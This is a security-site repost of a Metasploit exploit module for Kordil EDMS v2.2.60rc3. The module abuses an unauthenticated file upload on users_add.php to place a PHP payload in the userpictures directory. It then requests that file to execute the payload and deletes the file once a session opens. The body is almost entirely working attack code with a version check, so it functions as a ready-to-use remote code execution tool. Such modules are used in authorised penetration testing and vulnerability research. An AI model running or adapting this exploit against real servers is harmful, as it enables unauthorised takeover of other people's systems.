首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability
来源:metasploit.com 作者:Coles 发布时间:2013-02-27  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info={})
  super(update_info(info,
   'Name'           => "Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability",
   'Description'    => %q{
    This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.
    This application has an upload feature that allows an unauthenticated user
    to upload arbitrary files to the '/kordil_edms/userpictures/' directory.
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit
    ],
   'References'     =>
    [
     #['OSVDB', ''],
     #['EDB',   ''],
    ],
   'Platform'       => 'php',
   'Arch'           => ARCH_PHP,
   'Targets'        =>
    [
     ['Automatic Targeting', { 'auto' => true }]
    ],
   'Privileged'     => false,
   'DisclosureDate' => "Feb 22 2013",
   'DefaultTarget'  => 0))

  register_options(
   [
    OptString.new('TARGETURI', [true, 'The path to the web application', '/kordil_edms/']),
   ], self.class)
 end

 def check

  base  = target_uri.path
  peer  = "#{rhost}:#{rport}"

  # retrieve software version from login page
  begin
   res = send_request_cgi({
    'method' => 'GET',
    'uri'    => normalize_uri(base, 'global_group_login.php')
   })
   if res and res.code == 200
    if res.body =~ /<center><font face="Arial" size="2">Kordil EDMS v2\.2\.60/
     return Exploit::CheckCode::Vulnerable
    elsif res.body =~ /Kordil EDMS v/
     return Exploit::CheckCode::Detected
    end
   end
   return Exploit::CheckCode::Safe
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
   print_error("#{peer} - Connection failed")
  end
  return Exploit::CheckCode::Unknown

 end

 def upload(base, file)
  data = Rex::MIME::Message.new
  data.add_part(file,       'text/x-php', nil, "form-data; name=\"upload_fd31\"; filename=\"#{@fname}.php\"")
  data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd0"')
  data.add_part("#{@fname}", nil, nil, 'form-data; name="add_fd27"')
  data.add_part("n", nil, nil, 'form-data; name="act"')
  data_post = data.to_s
  data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

  res = send_request_cgi({
   'method'  => 'POST',
   'uri'     => normalize_uri(base, 'users_add.php'),
   'ctype'   => "multipart/form-data; boundary=#{data.bound}",
   'data'    => data_post
  })
  return res
 end

 def on_new_session(client)
  if client.type == "meterpreter"
   client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
   client.fs.file.rm("#{@fname}.php")
  else
   client.shell_command_token("rm #{@fname}.php")
  end
 end


 def exploit

  base   = target_uri.path
  @peer  = "#{rhost}:#{rport}"
  @fname = rand_text_numeric(7)

  # upload PHP payload to userpictures/[fname].php
  print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
  php    = %Q|<?php #{payload.encoded} ?>|
  begin
   res = upload(base, php)
   if res and res.code == 302 and res.headers['Location'] =~ /\.\/user_account\.php\?/
    print_good("#{@peer} - File uploaded successfully")
   else
    fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed")
   end
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
   fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
  end

  # retrieve and execute PHP payload
  print_status("#{@peer} - Executing payload (userpictures/#{@fname}.php)")
  begin
   res = send_request_cgi({
    'method' => 'GET',
    'uri'    => normalize_uri(base, 'userpictures', "#{@fname}.php")
   })
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
   fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
  end

 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Archlinux/x86-64 3.3.x-3.7.x x
·Glossword v1.8.8 - 1.8.12 Arbi
·Java Applet JMX Remote Code Ex
·PolarPearCms PHP File Upload V
·Microsoft Windows XP Professio
·Joomla <=2.5.8,<=3.0.2 remote
·Fileutils Ruby Gem Remote Comm
·MS Office 2010 Download Execut
·Ruby Gem ftpd-0.2.1 Remote Com
·Photodex ProShow Producer 5.0.
·Hanso Player 2.1.0 (.m3u) - Bu
·TeamViwer V8.0.16642 Insecure
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved